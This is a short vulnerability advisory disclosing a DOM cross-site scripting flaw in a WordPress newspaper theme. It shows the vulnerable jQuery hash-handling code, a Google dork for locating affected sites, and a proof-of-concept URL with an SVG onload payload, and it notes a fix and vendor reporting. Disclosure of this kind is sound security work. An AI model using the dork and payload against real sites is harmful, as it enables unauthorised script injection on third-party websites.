# Exploit Title: DOM Cross Site Scripting In Exquisite - Ultimate Newspaper
WordPressTheme
# Google Dork: inurl:/wp-content/exquisite-wp/assets/
# Date: 24/04/2015
# Exploit Author: Osama Mahmood (M4rkm3n)
# Vendor Homepage:
http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019
# Software Link:
http://themeforest.net/item/exquisite-ultimate-newspaper-theme/6264019
# Tested on: Windows 8/7
Hello friend,
Today i am filling this vulnerability which i found in the WordPress theme
(Exquisite - Ultimate Newspaper) DOM XSS
The vulnerability was caused by the issue is at line 83 of
exquisite-wp/assets/js/jquery.foundation.plugins.js
Vulnerable Code :-
});
if (window.location.hash) {
activateTab($('a[href="' + window.location.hash +
'"]').parent('dd'));
settings.callback();
}
};
and it was causing DOM XSS.
[-] Proof Of Concept:
URL:
http://localhost/x/wordpress/wp-content/exquisite-wp/assets/
http://localhost/x/wordpress/#<svg/onload=prompt(document.domain)>
[-] Fix / Solution:
Update to latest framework.
[-] Reported:
Was reported to the Developers on 26/04/2015
My Profile :-
https://www.facebook.com/th3.m4rkm3n.007
https://twitter.com/OsamaMahmood007
https://www.linkedin.com/in/osamamahmood007